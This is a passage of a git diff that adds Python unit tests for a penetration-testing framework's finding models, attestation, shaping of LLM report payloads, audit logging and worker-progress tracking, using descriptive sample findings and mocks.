owasp="A01:2021", + cwe=["CWE-639", "CWE-862"], + attack=["T1078"], + evidence=["endpoint=/api/records/2/", "status=200"], + replay_steps=["Login as user A", "GET /api/records/2/"], + remediation="Enforce object-level authorization.", + ) + defaults.update(overrides) + return GrayboxFinding(**defaults) + + def test_to_dict_roundtrip(self): + """to_dict() produces a JSON-safe dict.""" + f = self._make_finding() + d = f.to_dict() + self.assertIsInstance(d, dict) + # JSON serializable + serialized = json.dumps(d) + self.assertIsInstance(json.loads(serialized), dict) + # All fields present + self.assertEqual(d["scenario_id"], "PT-A01-01") + self.assertEqual(d["title"], "IDOR on /api/records/") + self.assertEqual(d["status"], "vulnerable") + self.assertEqual(d["severity"], "HIGH") + self.assertEqual(d["owasp"], "A01:2021") + self.assertEqual(d["cwe"], ["CWE-639", "CWE-862"]) + self.assertEqual(d["attack"], ["T1078"]) + + def test_to_flat_finding_vulnerable(self): + """Vulnerable status -> confidence=certain, severity preserved.""" + f = self._make_finding(status="vulnerable", severity="HIGH") + flat = f.to_flat_finding(port=443, protocol="https", probe_name="access_control") + self.assertEqual(flat["confidence"], "certain") + self.assertEqual(flat["severity"], "HIGH") + self.assertEqual(flat["probe_type"], "graybox") + self.assertEqual(flat["port"], 443) + self.assertEqual(flat["protocol"], "https") + self.assertEqual(flat["probe"], "access_control") + self.assertEqual(flat["category"], "graybox") + self.assertIn("finding_id", flat) + + def test_to_flat_finding_not_vulnerable(self): + """not_vulnerable status -> severity overridden to INFO.""" + f = self._make_finding(status="not_vulnerable", severity="HIGH") + flat = f.to_flat_finding(port=443, protocol="https", probe_name="access_control") + self.assertEqual(flat["severity"], "INFO") + self.assertEqual(flat["confidence"], "firm") + self.assertEqual(flat["status"], "not_vulnerable") + + def 
test_to_flat_finding_inconclusive(self): + """inconclusive status -> confidence=tentative.""" + f = self._make_finding(status="inconclusive", severity="MEDIUM") + flat = f.to_flat_finding(port=80, protocol="http", probe_name="injection") + self.assertEqual(flat["confidence"], "tentative") + self.assertEqual(flat["severity"], "MEDIUM") + + def test_evidence_joined(self): + """Evidence list is joined with '; ' in flat finding.""" + f = self._make_finding(evidence=["endpoint=/api/foo", "status=200"]) + flat = f.to_flat_finding(port=80, protocol="http", probe_name="test") + self.assertEqual(flat["evidence"], "endpoint=/api/foo; status=200") + + def test_cwe_joined(self): + """CWE list is joined with ', ' in flat finding.""" + f = self._make_finding(cwe=["CWE-639", "CWE-862"]) + flat = f.to_flat_finding(port=80, protocol="http", probe_name="test") + self.assertEqual(flat["cwe_id"], "CWE-639, CWE-862") + + def test_finding_id_deterministic(self): + """Same inputs produce the same finding_id.""" + f = self._make_finding() + flat1 = f.to_flat_finding(port=443, protocol="https", probe_name="ac") + flat2 = f.to_flat_finding(port=443, protocol="https", probe_name="ac") + self.assertEqual(flat1["finding_id"], flat2["finding_id"]) + + def test_finding_id_stable_for_equivalent_cwe_order(self): + """Equivalent CWE sets produce the same finding_id regardless of list order.""" + f1 = self._make_finding(cwe=["CWE-639", "CWE-862"]) + f2 = self._make_finding(cwe=["CWE-862", "CWE-639"]) + flat1 = f1.to_flat_finding(port=443, protocol="https", probe_name="ac") + flat2 = f2.to_flat_finding(port=443, protocol="https", probe_name="ac") + self.assertEqual(flat1["finding_id"], flat2["finding_id"]) + + def test_replay_steps_preserved(self): + """Replay steps round-trip to flat finding.""" + steps = ["Login as user A", "GET /api/records/2/"] + f = self._make_finding(replay_steps=steps) + flat = f.to_flat_finding(port=80, protocol="http", probe_name="test") + 
self.assertEqual(flat["replay_steps"], steps) + + def test_default_factory_lists(self): + """All list fields default to [] (not None).""" + f = GrayboxFinding( + scenario_id="PT-X", title="T", status="vulnerable", + severity="LOW", owasp="A01:2021", + ) + self.assertEqual(f.cwe, []) + self.assertEqual(f.attack, []) + self.assertEqual(f.evidence, []) + self.assertEqual(f.replay_steps, []) + + def test_attack_ids_in_flat(self): + """attack_ids field in flat finding contains MITRE IDs.""" + f = self._make_finding(attack=["T1078", "T1110"]) + flat = f.to_flat_finding(port=80, protocol="http", probe_name="test") + self.assertEqual(flat["attack_ids"], ["T1078", "T1110"]) + + def test_description_format(self): + """Description includes scenario_id and title.""" + f = self._make_finding(scenario_id="PT-A03-01", title="SQL Injection") + flat = f.to_flat_finding(port=80, protocol="http", probe_name="inj") + self.assertEqual(flat["description"], "Scenario PT-A03-01: SQL Injection") + + def test_error_field(self): + """error field is None by default, can be set.""" + f = self._make_finding() + self.assertIsNone(f.error) + f2 = self._make_finding(error="Connection refused") + self.assertEqual(f2.error, "Connection refused") + + def test_evidence_artifacts_roundtrip(self): + """Typed evidence artifacts serialize as JSON-safe dicts.""" + artifact = GrayboxEvidenceArtifact( + summary="GET /api/records/2 -> 200", + request_snapshot="GET /api/records/2", + response_snapshot='{"owner":"bob"}', + captured_at="2026-03-13T02:30:00Z", + raw_evidence_cid="QmEvidenceCID", + ) + f = self._make_finding(evidence_artifacts=[artifact]) + + payload = f.to_dict() + + self.assertEqual(payload["evidence_artifacts"][0]["summary"], "GET /api/records/2 -> 200") + self.assertEqual(payload["evidence_artifacts"][0]["raw_evidence_cid"], "QmEvidenceCID") + + def test_flat_finding_uses_artifact_summary_when_evidence_strings_absent(self): + """Artifact summaries backfill the legacy flat evidence field.""" + 
artifact = GrayboxEvidenceArtifact(summary="GET /admin -> 403") + f = self._make_finding(evidence=[], evidence_artifacts=[artifact]) + + flat = f.to_flat_finding(port=443, protocol="https", probe_name="access_control") + + self.assertEqual(flat["evidence"], "GET /admin -> 403") + self.assertEqual(flat["evidence_artifacts"][0]["summary"], "GET /admin -> 403") + + def test_flat_from_dict_preserves_typed_evidence_artifacts(self): + """flat_from_dict is the canonical persisted-finding normalization path.""" + payload = self._make_finding( + evidence=[], + evidence_artifacts=[{"summary": "GET /admin -> 403", "raw_evidence_cid": "Qm1"}], + ).to_dict() + + flat = GrayboxFinding.flat_from_dict(payload, port=443, protocol="https", probe_name="access_control") + + self.assertEqual(flat["evidence"], "GET /admin -> 403") + self.assertEqual(flat["evidence_artifacts"][0]["raw_evidence_cid"], "Qm1") + + def test_cvss_metadata_survives_flattening(self): + """Optional CVSS metadata survives typed graybox normalization.""" + f = self._make_finding( + cvss_score=8.8, + cvss_vector="CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + ) + + flat = f.to_flat_finding(port=443, protocol="https", probe_name="access_control") + + self.assertEqual(flat["cvss_score"], 8.8) + self.assertEqual(flat["cvss_vector"], "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H") + + def test_frozen(self): + """Finding is immutable.""" + f = self._make_finding() + with self.assertRaises(AttributeError): + f.title = "Changed" + + +if __name__ == '__main__': + unittest.main() diff --git a/extensions/business/cybersec/red_mesh/tests/test_hardening.py b/extensions/business/cybersec/red_mesh/tests/test_hardening.py new file mode 100644 index 00000000..7a4ccbe6 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_hardening.py @@ -0,0 +1,531 @@ +import json +import unittest +from collections import deque +from unittest.mock import MagicMock +import requests + +from .conftest import mock_plugin_modules + + 
+class TestAttestationHelpers(unittest.TestCase): + + def test_resolve_attestation_report_cid_prefers_explicit_cid(self): + from extensions.business.cybersec.red_mesh.mixins.attestation import _AttestationMixin + + result = _AttestationMixin._resolve_attestation_report_cid( + {"0xpeer1": {"report_cid": "QmWorkerCid"}}, + preferred_cid=" QmAggregatedCid ", + ) + self.assertEqual(result, "QmAggregatedCid") + + def test_resolve_attestation_report_cid_uses_single_worker_cid_as_fallback(self): + from extensions.business.cybersec.red_mesh.mixins.attestation import _AttestationMixin + + result = _AttestationMixin._resolve_attestation_report_cid( + {"0xpeer1": {"report_cid": "QmWorkerCid"}}, + ) + self.assertEqual(result, "QmWorkerCid") + + def test_submit_test_attestation_uses_explicit_report_cid(self): + from extensions.business.cybersec.red_mesh.mixins.attestation import _AttestationMixin + + class MockHost(_AttestationMixin): + REDMESH_ATTESTATION_DOMAIN = "0x" + ("11" * 32) + + def __init__(self): + self.cfg_attestation = {"ENABLED": True, "PRIVATE_KEY": "0xprivate", "RETRIES": 2} + self.ee_addr = "0xlauncher" + self.bc = MagicMock() + self.bc.eth_address = "0xsender" + self.bc.submit_attestation.return_value = "0xtxhash" + + def P(self, *_args, **_kwargs): + return None + + host = MockHost() + result = host._submit_redmesh_test_attestation( + job_id="jobid123", + job_specs={"target": "https://app.example.com", "run_mode": "SINGLEPASS"}, + workers={"0xlauncher": {"report_cid": "QmWorkerCid"}}, + vulnerability_score=7, + node_ips=["10.0.0.10"], + report_cid="QmAggregatedCid", + ) + + self.assertEqual(result["report_cid"], "QmAggregatedCid") + submit_kwargs = host.bc.submit_attestation.call_args.kwargs + self.assertEqual( + submit_kwargs["function_args"][-1], + host._attestation_pack_cid_obfuscated("QmAggregatedCid"), + ) + + def test_submit_test_attestation_retries_transient_failure(self): + from extensions.business.cybersec.red_mesh.mixins.attestation import 
_AttestationMixin + + class MockHost(_AttestationMixin): + REDMESH_ATTESTATION_DOMAIN = "0x" + ("11" * 32) + + def __init__(self): + self.cfg_attestation = {"ENABLED": True, "PRIVATE_KEY": "0xprivate", "RETRIES": 2} + self.ee_addr = "0xlauncher" + self.bc = MagicMock() + self.bc.eth_address = "0xsender" + self.bc.submit_attestation.side_effect = [RuntimeError("temporary"), "0xtxhash"] + + def P(self, *_args, **_kwargs): + return None + + host = MockHost() + result = host._submit_redmesh_test_attestation( + job_id="jobid123", + job_specs={"target": "https://app.example.com", "run_mode": "SINGLEPASS"}, + workers={"0xlauncher": {"report_cid": "QmWorkerCid"}}, + vulnerability_score=7, + node_ips=["10.0.0.10"], + report_cid="QmAggregatedCid", + ) + + self.assertEqual(result["tx_hash"], "0xtxhash") + self.assertEqual(host.bc.submit_attestation.call_count, 2) + + +class TestLlmRetryHardening(unittest.TestCase): + + def test_build_llm_analysis_payload_network_is_compact_and_structured(self): + from extensions.business.cybersec.red_mesh.mixins.llm_agent import _RedMeshLlmAgentMixin + + class MockHost(_RedMeshLlmAgentMixin): + def __init__(self): + self.cfg_llm_agent = {"ENABLED": True, "TIMEOUT": 5, "AUTO_ANALYSIS_TYPE": "security_assessment"} + self.cfg_llm_agent_api_host = "127.0.0.1" + self.cfg_llm_agent_api_port = 8080 + + host = MockHost() + aggregated_report = { + "nr_open_ports": 2, + "ports_scanned": 100, + "open_ports": [22, 443], + "scan_metrics": {"total_duration": 45.0}, + "service_info": { + "22": { + "port": 22, + "protocol": "ssh", + "service": "ssh", + "product": "OpenSSH", + "version": "9.6", + "banner": "SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.15", + "findings": [{ + "severity": "HIGH", + "title": "SSH weak key exchange", + "evidence": "Weak KEX offered: diffie-hellman-group14-sha1", + "port": 22, + "protocol": "ssh", + }], + }, + }, + "correlation_findings": [{ + "severity": "CRITICAL", + "title": "Redis unauthenticated access", + "evidence": "Response: 
+PONG", + "port": 6379, + "protocol": "redis", + }], + "port_banners": {"22": "x" * 5000}, + "worker_activity": [{"id": "node-a", "start_port": 1, "end_port": 5000, "open_ports": [22, 443]}], + } + job_config = {"target": "10.0.0.1", "scan_type": "network", "run_mode": "SINGLEPASS", "start_port": 1, "end_port": 8000} + + payload = host._build_llm_analysis_payload("job-1", aggregated_report, job_config, "security_assessment") + + self.assertIn("metadata", payload) + self.assertIn("services", payload) + self.assertIn("top_findings", payload) + self.assertIn("findings_summary", payload) + self.assertNotIn("port_banners", payload) + self.assertEqual(payload["metadata"]["job_id"], "job-1") + self.assertEqual(payload["findings_summary"]["total_findings"], 2) + + def test_run_aggregated_llm_analysis_uses_shaped_payload(self): + from extensions.business.cybersec.red_mesh.mixins.llm_agent import _RedMeshLlmAgentMixin + + class MockHost(_RedMeshLlmAgentMixin): + def __init__(self): + self.cfg_llm_agent = {"ENABLED": True, "TIMEOUT": 5, "AUTO_ANALYSIS_TYPE": "security_assessment"} + self.cfg_llm_agent_api_host = "127.0.0.1" + self.cfg_llm_agent_api_port = 8080 + self.captured = None + + def P(self, *_args, **_kwargs): + return None + + def Pd(self, *_args, **_kwargs): + return None + + def _auto_analyze_report(self, job_id, report, target, scan_type="network", analysis_type=None): + self.captured = report + return {"content": "ok"} + + host = MockHost() + aggregated_report = { + "nr_open_ports": 1, + "ports_scanned": 10, + "open_ports": [22], + "service_info": {"22": {"port": 22, "protocol": "ssh", "service": "ssh", "findings": []}}, + "port_banners": {"22": "y" * 2000}, + } + job_config = {"target": "10.0.0.1", "scan_type": "network", "run_mode": "SINGLEPASS", "start_port": 1, "end_port": 100} + + result = host._run_aggregated_llm_analysis("job-1", aggregated_report, job_config) + + self.assertEqual(result, "ok") + self.assertIsNotNone(host.captured) + 
self.assertIn("metadata", host.captured) + self.assertNotIn("port_banners", host.captured) + self.assertEqual(host._last_llm_payload_stats["analysis_type"], "security_assessment") + self.assertGreater(host._last_llm_payload_stats["raw_bytes"], host._last_llm_payload_stats["shaped_bytes"]) + self.assertGreater(host._last_llm_payload_stats["reduction_bytes"], 0) + + def test_build_llm_analysis_payload_deduplicates_and_tracks_truncation(self): + from extensions.business.cybersec.red_mesh.mixins.llm_agent import _RedMeshLlmAgentMixin + + class MockHost(_RedMeshLlmAgentMixin): + def __init__(self): + self.cfg_llm_agent = {"ENABLED": True, "TIMEOUT": 5, "AUTO_ANALYSIS_TYPE": "security_assessment"} + self.cfg_llm_agent_api_host = "127.0.0.1" + self.cfg_llm_agent_api_port = 8080 + + host = MockHost() + aggregated_report = { + "nr_open_ports": 3, + "ports_scanned": 200, + "open_ports": [22, 80, 443], + "service_info": { + "22": { + "port": 22, + "protocol": "ssh", + "service": "ssh", + "findings": [ + { + "severity": "HIGH", + "title": "SSH weak key exchange", + "evidence": "Weak KEX offered: diffie-hellman-group14-sha1", + "port": 22, + "protocol": "ssh", + }, + { + "severity": "HIGH", + "title": "SSH weak key exchange", + "evidence": "Duplicate evidence should be collapsed", + "port": 22, + "protocol": "ssh", + }, + ], + }, + }, + "correlation_findings": [ + { + "severity": "CRITICAL", + "title": f"Critical issue {idx}", + "evidence": "x" * 1000, + "port": 443, + "protocol": "tcp", + } + for idx in range(20) + ], + "worker_activity": [{"id": "node-a", "start_port": 1, "end_port": 5000, "open_ports": [22, 80, 443]}], + } + job_config = {"target": "10.0.0.1", "scan_type": "network", "run_mode": "SINGLEPASS", "start_port": 1, "end_port": 8000} + + payload = host._build_llm_analysis_payload("job-2", aggregated_report, job_config, "security_assessment") + + self.assertLessEqual(len(payload["top_findings"]), 40) + self.assertEqual(payload["findings_summary"]["total_findings"], 
21) + self.assertEqual(payload["truncation"]["deduplicated_findings"], 21) + self.assertEqual(payload["truncation"]["included_by_severity"]["CRITICAL"], 16) + self.assertGreater(payload["truncation"]["truncated_findings_count"], 0) + self.assertTrue(all(len(finding["evidence"]) <= 220 for finding in payload["top_findings"])) + + def test_quick_summary_payload_is_smaller_than_security_assessment(self): + from extensions.business.cybersec.red_mesh.mixins.llm_agent import _RedMeshLlmAgentMixin + + class MockHost(_RedMeshLlmAgentMixin): + def __init__(self): + self.cfg_llm_agent = {"ENABLED": True, "TIMEOUT": 5, "AUTO_ANALYSIS_TYPE": "security_assessment"} + self.cfg_llm_agent_api_host = "127.0.0.1" + self.cfg_llm_agent_api_port = 8080 + + host = MockHost() + aggregated_report = { + "nr_open_ports": 50, + "ports_scanned": 1000, + "open_ports": list(range(1, 51)), + "service_info": { + str(port): { + "port": port, + "protocol": "tcp", + "service": f"svc-{port}", + "findings": [{ + "severity": "HIGH" if port % 2 == 0 else "MEDIUM", + "title": f"Finding {port}", + "evidence": "e" * 400, + "port": port, + "protocol": "tcp", + }], + } + for port in range(1, 31) + }, + "worker_activity": [{"id": "node-a", "start_port": 1, "end_port": 1000, "open_ports": list(range(1, 51))}], + } + job_config = {"target": "10.0.0.2", "scan_type": "network", "run_mode": "SINGLEPASS", "start_port": 1, "end_port": 1000} + + security_payload = host._build_llm_analysis_payload("job-sec", aggregated_report, job_config, "security_assessment") + quick_payload = host._build_llm_analysis_payload("job-quick", aggregated_report, job_config, "quick_summary") + + self.assertGreater(len(security_payload["services"]), len(quick_payload["services"])) + self.assertGreater(len(security_payload["top_findings"]), len(quick_payload["top_findings"])) + self.assertGreater( + len(security_payload["coverage"]["open_ports_sample"]), + len(quick_payload["coverage"]["open_ports_sample"]), + ) + 
self.assertEqual(quick_payload["truncation"]["service_limit"], 12) + self.assertEqual(quick_payload["truncation"]["finding_limit"], 12) + + def test_record_llm_payload_stats_tracks_size_reduction(self): + from extensions.business.cybersec.red_mesh.mixins.llm_agent import _RedMeshLlmAgentMixin + + class MockHost(_RedMeshLlmAgentMixin): + def __init__(self): + self.cfg_llm_agent = {"ENABLED": True, "TIMEOUT": 5, "AUTO_ANALYSIS_TYPE": "security_assessment"} + self.cfg_llm_agent_api_host = "127.0.0.1" + self.cfg_llm_agent_api_port = 8080 + + def Pd(self, *_args, **_kwargs): + return None + + host = MockHost() + raw_report = {"service_info": {"80": {"banner": "x" * 3000}}, "port_banners": {"80": "y" * 4000}} + shaped = {"metadata": {"job_id": "job-obs"}, "truncation": {"finding_limit": 12}} + + stats = host._record_llm_payload_stats("job-obs", "quick_summary", raw_report, shaped) + + self.assertEqual(stats["analysis_type"], "quick_summary") + self.assertGreater(stats["raw_bytes"], stats["shaped_bytes"]) + self.assertGreater(stats["reduction_ratio"], 0) + self.assertEqual(host._last_llm_payload_stats["job_id"], "job-obs") + + def test_extract_report_findings_includes_graybox_results(self): + from extensions.business.cybersec.red_mesh.mixins.llm_agent import _RedMeshLlmAgentMixin + + class MockHost(_RedMeshLlmAgentMixin): + def __init__(self): + self.cfg_llm_agent = {"ENABLED": True, "TIMEOUT": 5, "AUTO_ANALYSIS_TYPE": "security_assessment"} + self.cfg_llm_agent_api_host = "127.0.0.1" + self.cfg_llm_agent_api_port = 8080 + + host = MockHost() + findings = host._extract_report_findings({ + "graybox_results": { + "443": { + "_graybox_authz": { + "findings": [{"scenario_id": "S-1", "title": "IDOR", "severity": "HIGH", "status": "vulnerable"}], + }, + }, + }, + }) + + self.assertEqual(len(findings), 1) + self.assertEqual(findings[0]["scenario_id"], "S-1") + + def test_build_llm_analysis_payload_webapp_is_compact_and_structured(self): + from 
extensions.business.cybersec.red_mesh.mixins.llm_agent import _RedMeshLlmAgentMixin + + class MockHost(_RedMeshLlmAgentMixin): + def __init__(self): + self.cfg_llm_agent = {"ENABLED": True, "TIMEOUT": 5, "AUTO_ANALYSIS_TYPE": "security_assessment"} + self.cfg_llm_agent_api_host = "127.0.0.1" + self.cfg_llm_agent_api_port = 8080 + + host = MockHost() + aggregated_report = { + "scan_metrics": {"scenarios_total": 3, "scenarios_vulnerable": 1}, + "scenario_stats": {"vulnerable": 1, "not_vulnerable": 1, "inconclusive": 1}, + "service_info": { + "443": { + "_graybox_discovery": { + "routes": ["/login", "/admin", "/login"], + "forms": [ + {"action": "/login", "method": "post"}, + {"action": "/admin", "method": "post"}, + ], + }, + }, + }, + "graybox_results": { + "443": { + "_graybox_authz": { + "findings": [ + { + "scenario_id": "PT-A01-01", + "title": "IDOR on records endpoint", + "status": "vulnerable", + "severity": "HIGH", + "owasp_id": "A01:2021", + "evidence": "GET /api/records/2 returned 200 for regular user", + }, + { + "scenario_id": "PT-A01-01", + "title": "IDOR on records endpoint", + "status": "vulnerable", + "severity": "HIGH", + "owasp_id": "A01:2021", + "evidence": "Duplicate evidence should be collapsed", + }, + ], + }, + }, + }, + "web_tests_info": { + "443": { + "_web_test_xss": { + "findings": [ + { + "scenario_id": "PT-A03-02", + "title": "Reflected XSS in search", + "status": "inconclusive", + "severity": "MEDIUM", + "owasp_id": "A03:2021", + "evidence": "Payload reflected in response body", + }, + ], + }, + }, + }, + "completed_tests": ["graybox_discovery", "_graybox_authz", "_web_test_xss"], + } + job_config = { + "target_url": "https://app.example.test", + "scan_type": "webapp", + "run_mode": "SINGLEPASS", + "app_routes": ["/seeded-route"], + "excluded_features": ["_graybox_stateful"], + } + + payload = host._build_llm_analysis_payload("job-web", aggregated_report, job_config, "security_assessment") + + 
self.assertEqual(payload["metadata"]["scan_type"], "webapp") + self.assertIn("probe_summary", payload) + self.assertIn("coverage", payload) + self.assertIn("attack_surface", payload) + self.assertNotIn("graybox_results", payload) + self.assertEqual(payload["findings_summary"]["total_findings"], 2) + self.assertEqual(payload["findings_summary"]["by_status"]["vulnerable"], 1) + self.assertEqual(payload["coverage"]["routes"]["total_routes"], 3) + self.assertEqual(payload["probe_summary"]["top_probes"][0]["probe"], "_graybox_authz") + + def test_call_llm_agent_api_retries_transient_connection_error(self): + from extensions.business.cybersec.red_mesh.mixins.llm_agent import _RedMeshLlmAgentMixin + + class MockHost(_RedMeshLlmAgentMixin): + def __init__(self): + self.cfg_llm_agent = {"ENABLED": True, "TIMEOUT": 5, "AUTO_ANALYSIS_TYPE": "security_assessment"} + self.cfg_llm_agent_api_host = "127.0.0.1" + self.cfg_llm_agent_api_port = 8080 + self.cfg_llm_api_retries = 2 + + def P(self, *_args, **_kwargs): + return None + + def Pd(self, *_args, **_kwargs): + return None + + class Response: + status_code = 200 + + @staticmethod + def json(): + return {"analysis": "ok"} + + host = MockHost() + original_post = requests.post + calls = {"count": 0} + + def flaky_post(*_args, **_kwargs): + calls["count"] += 1 + if calls["count"] == 1: + raise requests.exceptions.ConnectionError("temporary") + return Response() + + requests.post = flaky_post + try: + result = host._call_llm_agent_api("/analyze_scan", payload={"scan_results": {}}) + finally: + requests.post = original_post + + self.assertEqual(result["analysis"], "ok") + self.assertEqual(calls["count"], 2) + + def test_call_llm_agent_api_does_not_retry_non_retryable_provider_rejection(self): + from extensions.business.cybersec.red_mesh.mixins.llm_agent import _RedMeshLlmAgentMixin + + class MockHost(_RedMeshLlmAgentMixin): + def __init__(self): + self.cfg_llm_agent = {"ENABLED": True, "TIMEOUT": 5, "AUTO_ANALYSIS_TYPE": 
"security_assessment"} + self.cfg_llm_agent_api_host = "127.0.0.1" + self.cfg_llm_agent_api_port = 8080 + self.cfg_llm_api_retries = 2 + + def P(self, *_args, **_kwargs): + return None + + def Pd(self, *_args, **_kwargs): + return None + + class Response: + status_code = 500 + text = '{"detail":"DeepSeek API returned status 400"}' + + @staticmethod + def json(): + return {"detail": "DeepSeek API returned status 400"} + + host = MockHost() + original_post = requests.post + calls = {"count": 0} + + def rejected_post(*_args, **_kwargs): + calls["count"] += 1 + return Response() + + requests.post = rejected_post + try: + result = host._call_llm_agent_api("/analyze_scan", payload={"scan_results": {}}) + finally: + requests.post = original_post + + self.assertEqual(calls["count"], 1) + self.assertEqual(result["status"], "provider_request_error") + self.assertEqual(result["provider_status"], 400) + self.assertFalse(result["retryable"]) + + +class TestAuditLogHardening(unittest.TestCase): + + def test_audit_log_uses_bounded_deque(self): + mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + + plugin = PentesterApi01Plugin.__new__(PentesterApi01Plugin) + plugin._audit_log = deque(maxlen=3) + plugin.time = lambda: 123.0 + plugin.ee_addr = "0xnode" + plugin.ee_id = "node-1" + plugin.json_dumps = json.dumps + plugin.P = lambda *_args, **_kwargs: None + + for idx in range(5): + plugin._log_audit_event(f"event-{idx}", {"ordinal": idx}) + + self.assertIsInstance(plugin._audit_log, deque) + self.assertEqual(plugin._audit_log.maxlen, 3) + self.assertEqual(len(plugin._audit_log), 3) + self.assertEqual([entry["event"] for entry in plugin._audit_log], ["event-2", "event-3", "event-4"]) diff --git a/extensions/business/cybersec/red_mesh/tests/test_integration.py b/extensions/business/cybersec/red_mesh/tests/test_integration.py new file mode 100644 index 00000000..91f35c06 --- /dev/null +++ 
b/extensions/business/cybersec/red_mesh/tests/test_integration.py @@ -0,0 +1,1658 @@ +import json +import sys +import struct +import unittest +from unittest.mock import MagicMock, patch + +from .conftest import DummyOwner, MANUAL_RUN, PentestLocalWorker, color_print, mock_plugin_modules + + +class TestPhase12LiveProgress(unittest.TestCase): + """Phase 12: Live Worker Progress.""" + + @classmethod + def _mock_plugin_modules(cls): + if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: + return + mock_plugin_modules() + + def _get_plugin_class(self): + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + return PentesterApi01Plugin + + def test_worker_progress_model_roundtrip(self): + """WorkerProgress.from_dict(wp.to_dict()) preserves all fields.""" + from extensions.business.cybersec.red_mesh.models import WorkerProgress + wp = WorkerProgress( + job_id="job-1", + worker_addr="0xWorkerA", + pass_nr=2, + assignment_revision_seen=4, + progress=45.5, + phase="service_probes", + scan_type="network", + phase_index=3, + total_phases=5, + ports_scanned=500, + ports_total=1024, + open_ports_found=[22, 80, 443], + completed_tests=["fingerprint_completed", "service_info_completed"], + updated_at=1700000000.0, + started_at=1699999990.0, + first_seen_live_at=1699999990.0, + last_seen_at=1700000000.0, + finished=False, + live_metrics={"total_duration": 30.5}, + ) + d = wp.to_dict() + wp2 = WorkerProgress.from_dict(d) + self.assertEqual(wp2.job_id, "job-1") + self.assertEqual(wp2.worker_addr, "0xWorkerA") + self.assertEqual(wp2.pass_nr, 2) + self.assertEqual(wp2.assignment_revision_seen, 4) + self.assertAlmostEqual(wp2.progress, 45.5) + self.assertEqual(wp2.phase, "service_probes") + self.assertEqual(wp2.scan_type, "network") + self.assertEqual(wp2.phase_index, 3) + self.assertEqual(wp2.total_phases, 5) + self.assertEqual(wp2.ports_scanned, 500) + self.assertEqual(wp2.ports_total, 1024) + 
self.assertEqual(wp2.open_ports_found, [22, 80, 443]) + self.assertEqual(wp2.completed_tests, ["fingerprint_completed", "service_info_completed"]) + self.assertEqual(wp2.updated_at, 1700000000.0) + self.assertEqual(wp2.started_at, 1699999990.0) + self.assertEqual(wp2.first_seen_live_at, 1699999990.0) + self.assertEqual(wp2.last_seen_at, 1700000000.0) + self.assertFalse(wp2.finished) + self.assertEqual(wp2.live_metrics, {"total_duration": 30.5}) + + def test_get_job_progress_filters_by_job(self): + """get_job_progress returns only workers for the requested job.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + + # Simulate two jobs' progress in the :live hset + live_data = { + "job-A:worker-1": { + "job_id": "job-A", + "worker_addr": "worker-1", + "pass_nr": 1, + "assignment_revision_seen": 1, + "progress": 50, + "phase": "service_probes", + "ports_scanned": 50, + "ports_total": 100, + "open_ports_found": [], + "completed_tests": [], + "updated_at": 100.0, + "started_at": 90.0, + "first_seen_live_at": 90.0, + "last_seen_at": 100.0, + }, + "job-A:worker-2": { + "job_id": "job-A", + "worker_addr": "worker-2", + "pass_nr": 1, + "assignment_revision_seen": 1, + "progress": 75, + "phase": "web_tests", + "ports_scanned": 75, + "ports_total": 100, + "open_ports_found": [], + "completed_tests": [], + "updated_at": 100.0, + "started_at": 90.0, + "first_seen_live_at": 90.0, + "last_seen_at": 100.0, + }, + "job-B:worker-3": {"job_id": "job-B", "progress": 30}, + } + plugin.chainstore_hgetall.return_value = live_data + plugin.chainstore_hget.return_value = { + "job_id": "job-A", + "job_status": "RUNNING", + "job_pass": 1, + "workers": { + "worker-1": {"start_port": 1, "end_port": 100, "assignment_revision": 1}, + "worker-2": {"start_port": 101, "end_port": 200, "assignment_revision": 1}, + }, + } + plugin.time.return_value = 100.0 + + result = Plugin.get_job_progress(plugin, job_id="job-A") + 
self.assertEqual(result["job_id"], "job-A") + self.assertEqual(result["status"], "RUNNING") + self.assertEqual(len(result["workers"]), 2) + self.assertIn("worker-1", result["workers"]) + self.assertIn("worker-2", result["workers"]) + self.assertNotIn("worker-3", result["workers"]) + self.assertEqual(result["workers"]["worker-1"]["worker_state"], "active") + self.assertEqual(result["workers"]["worker-2"]["worker_state"], "active") + + def test_get_job_progress_empty(self): + """get_job_progress for non-existent job returns empty workers dict.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.chainstore_hgetall.return_value = {} + plugin.chainstore_hget.return_value = None + + result = Plugin.get_job_progress(plugin, job_id="nonexistent") + self.assertEqual(result["job_id"], "nonexistent") + self.assertIsNone(result["status"]) + self.assertEqual(result["workers"], {}) + + def test_get_job_progress_marks_unseen_assigned_worker(self): + """Assigned workers with no matching :live record are surfaced as unseen.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.chainstore_hgetall.return_value = {} + plugin.chainstore_hget.return_value = { + "job_id": "job-A", + "job_status": "RUNNING", + "job_pass": 3, + "workers": { + "worker-1": {"start_port": 1, "end_port": 10, "assignment_revision": 2}, + }, + } + plugin.time.return_value = 100.0 + + result = Plugin.get_job_progress(plugin, job_id="job-A") + + self.assertEqual(result["workers"]["worker-1"]["worker_state"], "unseen") + self.assertEqual(result["workers"]["worker-1"]["assignment_revision"], 2) + + def test_get_job_progress_ignores_live_from_old_revision(self): + """Mismatched live revision is ignored for the current assignment.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.chainstore_hgetall.return_value = { + "job-A:worker-1": 
